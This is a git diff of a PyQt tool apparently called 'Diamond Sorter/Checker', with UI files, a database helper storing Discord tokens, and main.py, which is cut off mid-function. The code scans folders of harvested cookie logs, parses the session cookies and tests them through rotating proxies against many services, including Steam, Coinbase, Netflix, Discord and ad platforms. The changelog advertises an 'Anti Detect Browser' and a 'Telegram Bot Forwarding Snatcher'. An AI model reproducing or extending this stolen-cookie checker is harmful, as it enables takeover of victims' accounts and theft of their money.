self.tab_2_widget_holder = QAxContainer.QAxWidget(self.information_tab2) + self.tab_2_widget_holder.setProperty("geometry", QtCore.QRect(10, 170, 391, 391)) + self.tab_2_widget_holder.setObjectName("tab_2_widget_holder") + icon1 = QtGui.QIcon() + icon1.addPixmap(QtGui.QPixmap("../../../OneDrive/Documents/New Structure/icons/go-back.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off) + self.login_tab_widget.addTab(self.information_tab2, icon1, "") + self.tab_2 = QtWidgets.QWidget() + self.tab_2.setObjectName("tab_2") + self.login_tab_widget.addTab(self.tab_2, "") + MainWindow.setCentralWidget(self.centralwidget) + self.statusbar = QtWidgets.QStatusBar(MainWindow) + self.statusbar.setObjectName("statusbar") + MainWindow.setStatusBar(self.statusbar) + + self.retranslateUi(MainWindow) + self.login_tab_widget.setCurrentIndex(0) + QtCore.QMetaObject.connectSlotsByName(MainWindow) + + def retranslateUi(self, MainWindow): + _translate = QtCore.QCoreApplication.translate + MainWindow.setWindowTitle(_translate("MainWindow", "MainWindow")) + self.c_label_button.setText(_translate("MainWindow", "C")) + self.u_label_button.setText(_translate("MainWindow", "U")) + self.o_label_button.setText(_translate("MainWindow", "O")) + self.login_label.setText(_translate("MainWindow", "Diamond Checker")) + self.S_label_button.setText(_translate("MainWindow", "S")) + self.r_label_button.setText(_translate("MainWindow", "R")) + self.Forgot_username_label.setText(_translate("MainWindow", "Forgot your User Name or password?")) + self.e_label_button.setText(_translate("MainWindow", "E")) + self.want_to_register_button.setText(_translate("MainWindow", "Want to Register?")) + self.d_label_button.setText(_translate("MainWindow", "D")) + self.o_label_button_2.setText(_translate("MainWindow", "O")) + self.P_label_button.setText(_translate("MainWindow", "P")) + self.E_label_button.setText(_translate("MainWindow", "E")) + self.N_label_button.setText(_translate("MainWindow", "N")) + self.update_1_label_5.setText(_translate("MainWindow", "1/12/24\n" +"-Launched to Pre-Release of DIamond Sorter\n" +"-Configured Licensing System\n" +"-Developed Login GUI")) + self.update_3_label_2.setText(_translate("MainWindow", "T.B.A")) + self.program_description_2.setText(_translate("MainWindow", "Hi,\n" +"Welcome to Diamond Sorter channel.\n" +"Don\'t forget to subscribe.")) + self.update_1_label_7.setText(_translate("MainWindow", "1/12/24\n" +"-Launched to Pre-Release of DIamond Sorter\n" +"-Configured Licensing System\n" +"-Developed Login GUI")) + self.update_2_label_2.setText(_translate("MainWindow", "1/14/24\n" +"- Developed Telegram Licensing Bot\n" +"- Added the 5 Feature Extensions\n" +"- Updated Anti Detect Browser\n" +"- Added Telegram Bot Forwarding Snatcher")) + self.update_1_label_8.setText(_translate("MainWindow", "1/12/24\n" +"-Launched to Pre-Release of DIamond Sorter\n" +"-Configured Licensing System\n" +"-Developed Login GUI")) + self.update_1_label_9.setText(_translate("MainWindow", "1/12/24\n" +"-Launched to Pre-Release of DIamond Sorter\n" +"-Configured Licensing System\n" +"-Developed Login GUI")) diff --git a/DiamondChecker/LoginCheked_UI.ui b/DiamondChecker/LoginCheked_UI.ui index a9d83e5..d13979f 100644 --- a/DiamondChecker/LoginCheked_UI.ui +++ b/DiamondChecker/LoginCheked_UI.ui @@ -1,1479 +1,1264 @@ - - - MainWindow - - - - 0 - 0 - 1067 - 801 - - - - MainWindow - - - background-color: #232629; - color: #ffffff; - - - - - - 570 - 20 - 471 - 601 - - - - QTabWidget::East - - - QTabWidget::Triangular - - - 0 - - - true - - - true - - - - - ../../../OneDrive/Documents/New Structure/icons/exit-to-app.png../../../OneDrive/Documents/New Structure/icons/exit-to-app.png - - - Login - - - - - 230 - 500 - 30 - 30 - - - - - 30 - 30 - - - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - - - Social Media Circled - 15 - - - - true - - - C - - - false - - - - - - 130 - 500 - 30 - 30 - - - - - 30 - 30 - - - - - Social Media Circled - 15 - - - - U - - - false - - - false - - - - - - 80 - 500 - 30 - 30 - - - - - 30 - 30 - - - - - Social Media Circled - 15 - - - - O - - - - - - 140 - 110 - 100 - 40 - - - - - 20 - true - - - - color:rgba(0, 0, 0, 200); - - - Log In - - - - - - 30 - 500 - 30 - 30 - - - - - 30 - 30 - - - - - Social Media Circled - 15 - - - - S - - - - - - 180 - 500 - 30 - 30 - - - - - 30 - 30 - - - - - Social Media Circled - 15 - - - - R - - - - - - 110 - 370 - 201 - 16 - - - - color:rgba(0, 0, 0, 210); - - - Forgot your User Name or password? - - - - - - 280 - 500 - 30 - 30 - - - - - 30 - 30 - - - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - - - Social Media Circled - 15 - - - - true - - - E - - - false - - - - - - 140 - 400 - 101 - 16 - - - - color:rgba(0, 0, 0, 210); - - - Want to Register? - - - - - - 330 - 500 - 30 - 30 - - - - - 30 - 30 - - - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - 255 - 255 - 255 - - - - - - - 35 - 38 - 41 - - - - - - - 35 - 38 - 41 - - - - - - - 255 - 255 - 255 - - - - - - - - - Social Media Circled - 15 - - - - true - - - D - - - false - - - - - - 100 - 440 - 30 - 30 - - - - - 30 - 30 - - - - - Social Media Circled - 15 - - - - O - - - - - - 150 - 440 - 30 - 30 - - - - - 30 - 30 - - - - - Social Media Circled - 15 - - - - P - - - - - - 200 - 440 - 30 - 30 - - - - - 30 - 30 - - - - - Social Media Circled - 15 - - - - E - - - - - - 250 - 440 - 30 - 30 - - - - - 30 - 30 - - - - - Social Media Circled - 15 - - - - N - - - - - - -540 - -10 - 531 - 611 - - - - background-color:rgba(0, 0, 0, 80); -border-top-left-radius: 50px; - - - - - - - - - -520 - 200 - 241 - 91 - - - - 1/12/24 --Launched to Pre-Release of DIamond Sorter --Configured Licensing System --Developed Login GUI - - - - - - -520 - 370 - 241 - 91 - - - - T.B.A - - - - - - -521 - 60 - 241 - 50 - - - - - 10 - true - - - - color:rgba(255, 255, 255, 170); - - - Hi, -Welcome to Diamond Sorter channel. -Don't forget to subscribe. - - - - - - -530 - 540 - 511 - 51 - - - - QFrame::StyledPanel - - - QFrame::Raised - - - - - - -270 - 290 - 241 - 91 - - - - 1/12/24 --Launched to Pre-Release of DIamond Sorter --Configured Licensing System --Developed Login GUI - - - - - - -520 - 280 - 241 - 91 - - - - 1/14/24 -- Developed Telegram Licensing Bot -- Added the 5 Feature Extensions -- Updated Anti Detect Browser -- Added Telegram Bot Forwarding Snatcher - - - - - - -260 - 390 - 241 - 91 - - - - 1/12/24 --Launched to Pre-Release of DIamond Sorter --Configured Licensing System --Developed Login GUI - - - - - - -260 - 200 - 241 - 91 - - - - 1/12/24 --Launched to Pre-Release of DIamond Sorter --Configured Licensing System --Developed Login GUI - - - - - - -530 - 0 - 521 - 130 - - - - background-color:rgba(0, 0, 0, 75); - - - - - - - - - -260 - 10 - 231 - 81 - - - - - 22 - true - - - - color:rgba(255, 255, 255, 200); - - - Diamond💎 - Sorter - - - - - - 60 - 200 - 301 - 41 - - - - - Furore - 10 - - - - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; - - - Telegram login (without "@") - - - - - - 40 - 270 - 341 - 41 - - - - - Furore - 10 - - - - color: #1de9b6; - background-color: #31363b; - border: 2px solid #1de9b6; - border-radius: 4px; - height: 32px; - - - - Authorization - - - false - - - - - - - ../../../OneDrive/Documents/New Structure/icons/go-back.png../../../OneDrive/Documents/New Structure/icons/go-back.png - - - Information - - - - - 10 - 170 - 391 - 391 - - - - - - - Project Information + Updates - - - - - - - 70 - 30 - 241 - 50 - - - - - 10 - true - - - - color:rgba(255, 255, 255, 170); - - - Hi, -Welcome to Diamond Sorter channel. -Don't forget to subscribe. - - - - - - 330 - 30 - 231 - 81 - - - - - 22 - true - - - - color:rgba(255, 255, 255, 200); - - - Diamond💎 - Sorter - - - - - - 60 - 150 - 511 - 381 - - - - QFrame::StyledPanel - - - QFrame::Raised - - - - - 200 - 10 - 91 - 31 - - - - - HACKED - 22 - - - - Updates - - - - - - 10 - 60 - 241 - 91 - - - - 1/12/24 --Launched to Pre-Release of DIamond Sorter --Configured Licensing System --Developed Login GUI - - - - - - 10 - 140 - 241 - 91 - - - - 1/14/24 -- Developed Telegram Licensing Bot -- Added the 5 Feature Extensions -- Updated Anti Detect Browser -- Added Telegram Bot Forwarding Snatcher - - - - - - 10 - 230 - 241 - 91 - - - - T.B.A - - - - - - 270 - 60 - 241 - 91 - - - - 1/12/24 --Launched to Pre-Release of DIamond Sorter --Configured Licensing System --Developed Login GUI - - - - - - 260 - 150 - 241 - 91 - - - - 1/12/24 --Launched to Pre-Release of DIamond Sorter --Configured Licensing System --Developed Login GUI - - - - - - 270 - 250 - 241 - 91 - - - - 1/12/24 --Launched to Pre-Release of DIamond Sorter --Configured Licensing System --Developed Login GUI - - - - - - - 60 - 20 - 511 - 130 - - - - background-color:rgba(0, 0, 0, 75); - - - - - - - - - - - QAxWidget - QWidget -
qaxwidget.h
-
-
- - -
+ + + MainWindow + + + + 0 + 0 + 476 + 801 + + + + MainWindow + + + background-color: #232629; + color: #ffffff; + + + + + + 0 + 0 + 471 + 601 + + + + QTabWidget::East + + + QTabWidget::Triangular + + + 0 + + + true + + + true + + + + + ../../../OneDrive/Documents/New Structure/icons/exit-to-app.png../../../OneDrive/Documents/New Structure/icons/exit-to-app.png + + + Login + + + + + 230 + 500 + 30 + 30 + + + + + 30 + 30 + + + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + + + Social Media Circled + 15 + + + + true + + + C + + + false + + + + + + 130 + 500 + 30 + 30 + + + + + 30 + 30 + + + + + Social Media Circled + 15 + + + + U + + + false + + + false + + + + + + 80 + 500 + 30 + 30 + + + + + 30 + 30 + + + + + Social Media Circled + 15 + + + + O + + + + + + 90 + 0 + 241 + 40 + + + + + 20 + true + + + + color:rgba(0, 0, 0, 200); + + + Diamond Checker + + + + + + 30 + 500 + 30 + 30 + + + + + 30 + 30 + + + + + Social Media Circled + 15 + + + + S + + + + + + 180 + 500 + 30 + 30 + + + + + 30 + 30 + + + + + Social Media Circled + 15 + + + + R + + + + + + 110 + 370 + 201 + 16 + + + + color:rgba(0, 0, 0, 210); + + + Forgot your User Name or password? + + + + + + 280 + 500 + 30 + 30 + + + + + 30 + 30 + + + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + + + Social Media Circled + 15 + + + + true + + + E + + + false + + + + + + 140 + 400 + 101 + 16 + + + + color:rgba(0, 0, 0, 210); + + + Want to Register? + + + + + + 330 + 500 + 30 + 30 + + + + + 30 + 30 + + + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + 255 + 255 + 255 + + + + + + + 35 + 38 + 41 + + + + + + + 35 + 38 + 41 + + + + + + + 255 + 255 + 255 + + + + + + + + + Social Media Circled + 15 + + + + true + + + D + + + false + + + + + + 100 + 440 + 30 + 30 + + + + + 30 + 30 + + + + + Social Media Circled + 15 + + + + O + + + + + + 150 + 440 + 30 + 30 + + + + + 30 + 30 + + + + + Social Media Circled + 15 + + + + P + + + + + + 200 + 440 + 30 + 30 + + + + + 30 + 30 + + + + + Social Media Circled + 15 + + + + E + + + + + + 250 + 440 + 30 + 30 + + + + + 30 + 30 + + + + + Social Media Circled + 15 + + + + N + + + + + + -540 + -10 + 531 + 611 + + + + background-color:rgba(0, 0, 0, 80); +border-top-left-radius: 50px; + + + + + + + + + -520 + 200 + 241 + 91 + + + + 1/12/24 +-Launched to Pre-Release of DIamond Sorter +-Configured Licensing System +-Developed Login GUI + + + + + + -520 + 370 + 241 + 91 + + + + T.B.A + + + + + + -521 + 60 + 241 + 50 + + + + + 10 + true + + + + color:rgba(255, 255, 255, 170); + + + Hi, +Welcome to Diamond Sorter channel. +Don't forget to subscribe. + + + + + + -530 + 540 + 511 + 51 + + + + QFrame::StyledPanel + + + QFrame::Raised + + + + + + -270 + 290 + 241 + 91 + + + + 1/12/24 +-Launched to Pre-Release of DIamond Sorter +-Configured Licensing System +-Developed Login GUI + + + + + + -520 + 280 + 241 + 91 + + + + 1/14/24 +- Developed Telegram Licensing Bot +- Added the 5 Feature Extensions +- Updated Anti Detect Browser +- Added Telegram Bot Forwarding Snatcher + + + + + + -260 + 390 + 241 + 91 + + + + 1/12/24 +-Launched to Pre-Release of DIamond Sorter +-Configured Licensing System +-Developed Login GUI + + + + + + -260 + 200 + 241 + 91 + + + + 1/12/24 +-Launched to Pre-Release of DIamond Sorter +-Configured Licensing System +-Developed Login GUI + + + + + + -530 + 0 + 521 + 130 + + + + background-color:rgba(0, 0, 0, 75); + + + + + + + + + -260 + 10 + 231 + 81 + + + + + 22 + true + + + + color:rgba(255, 255, 255, 200); + + + Diamond💎 + Sorter + + + + + + 40 + 270 + 341 + 41 + + + + + Furore + 10 + + + + color: #1de9b6; + background-color: #31363b; + border: 2px solid #1de9b6; + border-radius: 4px; + height: 32px; + + + + Authorization + + + true + + + false + + + + + + + ../../../OneDrive/Documents/New Structure/icons/go-back.png../../../OneDrive/Documents/New Structure/icons/go-back.png + + + Information + + + + + 10 + 170 + 391 + 391 + + + + + + + Project Information + Updates + + + + + + + + + QAxWidget + QWidget +
qaxwidget.h
+
+
+ + +
diff --git a/DiamondChecker/canapeshecka_bd.py b/DiamondChecker/canapeshecka_bd.py index b76640d..05d6e04 100644 --- a/DiamondChecker/canapeshecka_bd.py +++ b/DiamondChecker/canapeshecka_bd.py @@ -1,33 +1,33 @@ -import sqlite3 - - -class SQLighter: - - def __init__(self, database_file): - """CONNECT BD SAVE CUR""" - self.connection = sqlite3.connect(database_file) - self.cursor = self.connection.cursor() - - def whid_bd(self, username): - """CHECK BD username""" - with self.connection: - result = self.cursor.execute("SELECT * FROM `users` WHERE `username` = ?", (username,)).fetchall() - return result - - def add_hid_db(self, username, whid): - with self.connection: - return self.cursor.execute("UPDATE `users` SET `whid` = ? WHERE `username` = ?", (whid, username,)) - - def first_start_db(self, username, whid): - self.cursor.execute("""CREATE TABLE discord ( - id INTEGER PRIMARY KEY AUTOINCREMENT, - folders TEXT, - file_path TEXT, - token TEXT, - status TEXT); - """) - self.connection.commit() - - def close(self): - self.connection.close() - +import sqlite3 + + +class SQLighter: + + def __init__(self, database_file): + """CONNECT BD SAVE CUR""" + self.connection = sqlite3.connect(database_file) + self.cursor = self.connection.cursor() + + def whid_bd(self, username): + """CHECK BD username""" + with self.connection: + result = self.cursor.execute("SELECT * FROM `users` WHERE `username` = ?", (username,)).fetchall() + return result + + def add_hid_db(self, username, whid): + with self.connection: + return self.cursor.execute("UPDATE `users` SET `whid` = ? WHERE `username` = ?", (whid, username,)) + + def first_start_db(self, username, whid): + self.cursor.execute("""CREATE TABLE discord ( + id INTEGER PRIMARY KEY AUTOINCREMENT, + folders TEXT, + file_path TEXT, + token TEXT, + status TEXT); + """) + self.connection.commit() + + def close(self): + self.connection.close() + diff --git a/DiamondChecker/convert.py b/DiamondChecker/convert.py new file mode 100644 index 0000000..585d2d3 --- /dev/null +++ b/DiamondChecker/convert.py @@ -0,0 +1,10 @@ +from PyQt5 import uic + +# Load the UI file +ui_file = "LoginCheked_UI.ui" +py_file = "LoginCheked_UI.py" + +# Convert the UI file to a Python file +uic.compileUi(ui_file, open(py_file, "w")) + +print(f"Successfully converted {ui_file} to {py_file}") \ No newline at end of file diff --git a/DiamondChecker/jsoni_control.py b/DiamondChecker/jsoni_control.py index cdafa47..a48719e 100644 --- a/DiamondChecker/jsoni_control.py +++ b/DiamondChecker/jsoni_control.py @@ -1,29 +1,29 @@ -import json - - -class Config: - def __init__(self): - self.config_file = "settings.json" - - def settings_reader(self): - with open(self.config_file, "r", encoding='utf-8') as read_file: - data = json.load(read_file) - return data - - def settings_write(self, data): - with open(self.config_file, "w", encoding='utf-8') as outfile: - json.dump(data, outfile, indent=4) - -class DB_logs: - def __init__(self): - self.config_file = "logs_info.json" - - def settings_reader(self): - with open(self.config_file, "r", encoding='utf-8') as read_file: - data = json.load(read_file) - return data - - def settings_write(self, data): - with open(self.config_file, "w", encoding='utf-8') as outfile: - json.dump(data, outfile, indent=4) - +import json + + +class Config: + def __init__(self): + self.config_file = "settings.json" + + def settings_reader(self): + with open(self.config_file, "r", encoding='utf-8') as read_file: + data = json.load(read_file) + return data + + def settings_write(self, data): + with open(self.config_file, "w", encoding='utf-8') as outfile: + json.dump(data, outfile, indent=4) + +class DB_logs: + def __init__(self): + self.config_file = "logs_info.json" + + def settings_reader(self): + with open(self.config_file, "r", encoding='utf-8') as read_file: + data = json.load(read_file) + return data + + def settings_write(self, data): + with open(self.config_file, "w", encoding='utf-8') as outfile: + json.dump(data, outfile, indent=4) + diff --git a/DiamondChecker/main.py b/DiamondChecker/main.py index 52ce1ae..ad61f53 100644 --- a/DiamondChecker/main.py +++ b/DiamondChecker/main.py @@ -1,1697 +1,1710 @@ -import datetime as DT -import glob -import http.client -import json -import os -import random -import re -import shutil -import socket -import sys -import threading - - -import requests -from PyQt5 import QtWidgets -from PyQt5.QtCore import QThread, QTimer -from PyQt5.QtCore import pyqtSignal -from PyQt5.QtGui import QIcon -from PyQt5.QtWidgets import QFileDialog -from PyQt5.QtWidgets import QMessageBox -from bs4 import BeautifulSoup as bs -from wmi import WMI - -from LoginCheked_UI import Ui_MainWindow -from jsoni_control import Config - -import LoginCheked_UI -import main_ui - -checked = 0 -yt_cookies = [] -vk_cookies = [] -VK_CHECKED = 0 -YT_CHECKED = 0 -INST_CHECKED = 0 -AMAZON_CHECKED = 0 -STEAM_CHECKED = 0 -EPIC_CHECKED = 0 -TWITCH_CHECKED = 0 -http.client._MAXHEADERS = 1000000 -proxies = None - - -class CheckThread(QThread): - console_add_text = pyqtSignal(str) - info_progress = pyqtSignal(int) - progres_setup = pyqtSignal(int) - - def __init__(self): - QThread.__init__(self) - self.timer = QTimer() - - def err(e, exit=True): - input(e) - if exit: - sys.exit() - - def get_path(self, path): - new_path = '' - counter = 0 - for i in path: - if i == "\\": - counter += 1 - if counter >= 2: - break - new_path += i - return new_path - - def files_reader(self, logs): - self.console_add_text.emit('Looking for cookies...') - - all_cooks = [] - - for folder, subfolder, file in os.walk(logs): - for filename in file: - if filename.endswith('.txt'): - all_cooks += [os.path.join(folder, filename)] - self.console_add_text.emit(f"Was it possible to find : {len(all_cooks)}") - self.progres_setup.emit(len(all_cooks)) - return all_cooks - - def get_proxies_from_file(self, settings): - global proxies - try: - with open(settings['settings']['proxies_file'], 'r', encoding='utf-8') as (pf): - proxies = pf.read().splitlines() - self.console_add_text.emit(f"Proxies are enabled, downloaded {len(proxies)} a proxy, like {settings['settings']['PROXY']}\n") - except FileNotFoundError: - self.console_add_text.emit( - f"The proxy file was not found: {settings['settings']['proxies_file']} restart and select a file with a proxy or any TXT\n") - self.err(f"file {settings['settings']['proxies_file']} not found") - except Exception as e: - self.err(f"get_proxies_from_file: {e}") - - pass - - def get_random_proxy(self, settings): - random_proxy = random.choice(proxies) - try: - ip, port, username, password = random_proxy.split(':') - return {'https': f"{settings['settings']['PROXY']}://{username}:{password}@{ip}:{port}"} - except ValueError: - return {'https': f"{settings['settings']['PROXY']}://{random_proxy}"} - - def save_cookies_yt(self, folder_name, cookie_name, channel_name, subscribers): - global yt_cookies - try: - if channel_name not in yt_cookies: - if os.path.exists(folder_name): - cookie_file = open(f'{cookie_name}', 'r', encoding='utf-8') - results = open(f'{folder_name}//{folder_name}_subscribers_{subscribers}_channel_{channel_name}.txt', 'w', - encoding='utf-8') - results.write(f'{cookie_file.read()}') - results.close() - cookie_file.close() - yt_cookies.append(channel_name) - else: - os.mkdir(folder_name) - cookie_file = open(f'{cookie_name}', 'r', encoding='utf-8') - results = open(f'{folder_name}//{folder_name}_subscribers_{subscribers}_channel_{channel_name}.txt', 'w', - encoding='utf-8') - results.write(f'{cookie_file.read()}') - results.close() - cookie_file.close() - yt_cookies.append(channel_name) - except: - pass - - def save_cookies(self, folder_name, cookie_name): - try: - if os.path.exists(folder_name): - cookie_file = open(f'{cookie_name}', 'r', encoding='utf-8') - results = open(f'{folder_name}//{folder_name}{random.randint(1, 100000000)}.txt', 'w', encoding='utf-8') - results.write(f'{cookie_file.read()}') - results.close() - cookie_file.close() - else: - os.mkdir(folder_name) - cookie_file = open(f'{cookie_name}', 'r', encoding='utf-8') - results = open(f'{folder_name}//{folder_name}{random.randint(1, 100000000)}.txt', 'w', encoding='utf-8') - results.write(f'{cookie_file.read()}') - results.close() - cookie_file.close() - except UnicodeDecodeError: - try: - if os.path.exists(folder_name): - cookie_file = open(f'{cookie_name}', 'r') - results = open(f'{folder_name}//{folder_name}{random.randint(1, 100000000)}.txt', 'w', - encoding='utf-8') - results.write(f'{cookie_file.read()}') - results.close() - cookie_file.close() - else: - os.mkdir(folder_name) - cookie_file = open(f'{cookie_name}', 'r') - results = open(f'{folder_name}//{folder_name}{random.randint(1, 100000000)}.txt', 'w', - encoding='utf-8') - results.write(f'{cookie_file.read()}') - results.close() - cookie_file.close() - except: - pass - pass - - def open_cookie_json(self, cookie_name, service): - with open(cookie_name, "r") as read_file: - data = json.load(read_file) - cookie = {} - for i in range(0, len(data)): - try: - if service in data[i]["domain"]: - cookie[data[i]["name"]] = f'{data[i]["value"]}' - except: - continue - return cookie - - def select_useragent_mode(self, settings): - if settings['settings']['USERAGENT'] == 2: - global useragents - try: - with open(settings['settings']['useragents_file'], 'r', encoding='utf-8') as (pf): - useragents = pf.read().splitlines() - self.console_add_text.emit(f'Uploaded {len(useragents)} user agents\n') - return useragents - except Exception as err: - self.console_add_text.emit("Error loading the user agent, you may have entered an incorrect file name" + self.err) - else: - pass - - def net_to_cookie(self, filename, service): - cookies = {} - try: - with open(filename, 'r', encoding='utf-8') as fp: - for line in fp: - try: - if not re.match(r'^\#', line) and service in line: - lineFields = line.strip().split('\t') - cookies[lineFields[5]] = lineFields[6] - except Exception as err: - continue - except UnicodeDecodeError: - with open(filename, 'r') as fp: - for line in fp: - try: - if not re.match(r'^\#', line) and service in line: - lineFields = line.strip().split('\t') - cookies[lineFields[5]] = lineFields[6] - except Exception as err: - continue - return cookies - - def save_results(self, folder_name, file_name, text_to_insert): - if os.path.exists(folder_name): - results = open(f'{folder_name}\\{file_name}', 'a', encoding='utf-8') - results.write(f'{text_to_insert}\n') - results.close() - else: - os.mkdir(folder_name) - results = open(f'{folder_name}\\{file_name}', 'a', encoding='utf-8') - results.write(f'{text_to_insert}\n') - results.close() - - def save_logs(self, folder_name, cookie_name, text_to_insert): - try: - if os.path.exists(folder_name): - shutil.copytree(self.get_path(cookie_name), folder_name+"\\"+self.get_path(cookie_name).split("\\")[1]) - self.save_results(folder_name+"\\"+self.get_path(cookie_name).split("\\")[1], - folder_name+"_checked_info.txt", - f'{text_to_insert}\n\n') - else: - os.mkdir(folder_name) - shutil.copytree(self.get_path(cookie_name), folder_name + "\\" + self.get_path(cookie_name).split("\\")[1]) - self.save_results(folder_name + "\\" + self.get_path(cookie_name).split("\\")[1], - folder_name + "_checked_info.txt", - f'{text_to_insert}\n\n') - except Exception as err: - print(err) - pass - - def check_all(self, all_cooks, start, end, settings): - global checked - for i in range(start, end): - try: - if settings['services']['EPICGAMES'] == 2: - try: - self.check_epic(all_cooks[i], settings) - except: - pass - if settings['services']['FREEBITCOIN'] == 2: - try: - self.check_free_bitcoin(all_cooks[i], settings) - except: - pass - if settings['services']['FUNPAY'] == 2: - try: - self.check_funpay(all_cooks[i], settings) - except: - pass - if settings['services']['VK'] == 2: - try: - self.check_vk(all_cooks[i], settings) - except: - pass - if settings['services']['STEAM'] == 2: - try: - self.check_steam(all_cooks[i], settings) - except: - pass - if settings['services']['YT'] == 2: - try: - self.check_youtube(all_cooks[i], settings) - except: - pass - if settings['services']['BATTLE'] == 2: - try: - self.check_battlenet_games(all_cooks[i], settings) - except: - pass - if settings['services']['INSTAGRAM'] == 2: - try: - self.check_instagram(all_cooks[i], settings) - except: - pass - if settings['services']['FACEBOOK'] == 2: - try: - self.check_facebook_ads(all_cooks[i], settings) - except: - pass - if settings['services']['ROBLOX'] == 2: - try: - self.check_roblox(all_cooks[i], settings) - except: - pass - if settings['services']['NETFLIX'] == 2: - try: - self.check_netflix(all_cooks[i], settings) - except: - pass - if settings['services']['HUMBLE'] == 2: - try: - self.check_humble(all_cooks[i], settings) - except: - pass - if settings['services']['COINBASE'] == 2: - try: - self.check_coinbase(all_cooks[i], settings) - except: - pass - if settings['services']['AMAZON'] == 2: - try: - self.check_amazon(all_cooks[i], settings) - except: - pass - if settings['services']['KRYPTEX'] == 2: - try: - self.check_kryptex(all_cooks[i], settings) - except: - pass - if settings['services']['TIKTOK'] == 2: - try: - self.check_tiktok(all_cooks[i], settings) - except: - pass - if settings['services']['PATHOFEXILE'] == 2: - try: - self.check_pathofexile(all_cooks[i], settings) - except: - pass - if settings['services']['HITBTC'] == 2: - try: - self.check_hitbtc(all_cooks[i], settings) - except: - pass - if settings['services']['DISCORD'] == 2: - try: - self.check_discord(all_cooks[i], settings) - except: - pass - if settings['services']['BINGADS'] == 2: - try: - self.check_bingads(all_cooks[i], settings) - except: - pass - if settings['services']['SNAPCHATADS'] == 2: - try: - self.check_snapchatads(all_cooks[i], settings) - except: - pass - if settings['services']['SEMRUSH'] == 2: - try: - self.check_semrush(all_cooks[i], settings) - except: - pass - if settings['services']['REDDITADS'] == 2: - try: - self.check_redditads(all_cooks[i], settings) - except: - pass - if settings['services']['TINDERADS'] == 2: - try: - self.check_tinderads(all_cooks[i], settings) - except: - pass - if settings['services']['MICROSOFTADS'] == 2: - try: - self.check_microsoftads(all_cooks[i], settings) - except: - pass - if settings['services']['CRAIGSLISTADS'] == 2: - try: - self.check_craigslistads(all_cooks[i], settings) - except: - pass - if settings['services']['AIRBNB'] == 2: - try: - self.check_airbnb(all_cooks[i], settings) - except: - pass - if settings['services']['TWITTERADS'] == 2: - try: - 